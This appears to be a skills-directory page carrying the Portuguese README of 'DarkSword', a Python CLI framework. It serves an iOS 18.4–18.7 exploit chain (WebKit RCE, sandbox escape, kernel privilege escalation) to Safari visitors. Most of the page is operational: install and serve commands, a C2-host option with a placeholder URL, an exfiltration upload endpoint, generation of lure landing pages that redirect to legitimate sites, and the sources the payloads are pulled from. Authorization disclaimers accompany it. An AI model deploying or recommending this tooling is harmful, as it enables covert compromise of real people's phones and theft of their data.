Darksword
Python CLI framework to serve and sync the DarkSword iOS exploit-chain payloads (iOS 18.4–18.7).
Install / Use
/learn @bhideki/DarkswordREADME
DarkSword Red Team Framework
Framework Python com CLI para entrega da cadeia de exploits DarkSword em operações de red team. Baseado nos repositórios DarkSword-RCE e darksword-kexploit.
Aviso: Use apenas em ambientes autorizados. Operações de red team requerem autorização formal.
Referências
- Google Threat Intelligence - DarkSword iOS Exploit Chain
- Suporta iOS 18.4 - 18.7 (WebKit RCE + privilege escalation)
Instalação
git clone https://github.com/bhideki/darksword.git
cd darksword
pip install -e .
Uso Rápido
darksword serve
Acesse de um dispositivo iOS (Safari): http://<SEU_IP>:8080/
Payloads e kexploit ja incluidos. Para atualizar: darksword sync e darksword sync-kexploit
Comandos CLI
| Comando | Descrição |
|---------|-----------|
| darksword serve | Inicia servidor HTTP para entrega dos exploits |
| darksword sync | Baixa payloads do repositório DarkSword-RCE |
| darksword list | Lista payloads disponíveis localmente |
| darksword info | Exibe informações sobre a cadeia e CVEs |
| darksword template generate | Gera landing page personalizada |
| darksword template list | Lista templates disponíveis |
| darksword sync-kexploit | Baixa kernel exploit (opa334, Objective-C) |
Opções do serve
darksword serve -H 0.0.0.0 -p 8080
darksword serve -p 8443 --c2-host https://seu-c2.com/payload
-H, --host: Host (padrão: 0.0.0.0)-p, --port: Porta (padrão: 8080)--c2-host: C2 customizado (ex:http://seu-ip:8080) - sobrescreve host/porta no pe_main.js--redirect: URL de redirecionamento em fallback
Sem --c2-host, o host/porta sao obtidos do Host header (mesmo servidor). Dados exfiltrados vao para exfil/ e POST /upload.
Gerar landing page customizada
darksword template generate --title "Promoção Especial" --redirect https://site-legitimo.com
Estrutura do Projeto
DarkSword/
├── darksword/ # Modulo Python
│ ├── cli.py # CLI principal
│ ├── server.py # Servidor HTTP
│ ├── payloads.py # Sync e gestao de payloads
│ └── config.py
├── payloads/ # Payloads Web (apos darksword sync)
├── templates/ # Templates de landing page
├── kexploit/ # Kernel exploit Obj-C (apos darksword sync-kexploit)
├── pyproject.toml
└── README.md
Verificacao repos
| Repo | Arquivos | |------|----------| | htimesnine/DarkSword-RCE | index.html, frame.html, rce_loader.js, rce_module*.js, rce_worker*.js, sbx*.js, pe_main.js | | ghh-jb/DarkSword | Identico (fallback) | | opa334/darksword-kexploit | Makefile, src/main.m, entitlements.plist | | Nao publico | rce_worker_18.7.js (iOS 18.7) |
Fluxo da Cadeia DarkSword
- index.html → Landing page carrega frame.html em iframe oculto
- frame.html → Injeta rce_loader.js
- rce_loader.js → Carrega módulos RCE conforme versão do iOS
- rce_module.js / rce_module_18.6.js → Módulos RCE
- rce_worker_18.4.js / rce_worker_18.6.js → Web Workers (exploits JSC)
- sbx0_main_18.4.js / sbx1_main.js → Sandbox escape
- pe_main.js → Privilege escalation
Requisitos Éticos
- Autorização: Use apenas contra sistemas que você tem permissão explícita para testar
- Escopo: Respeite os limites definidos no contrato/escopo do engajamento
- Documentação: Registre todas as atividades para relatórios de red team
Licença
MIT - Apenas para fins educacionais e de testes de segurança autorizados.
Related Skills
node-connect
347.6kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
108.4kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
347.6kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
347.6kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
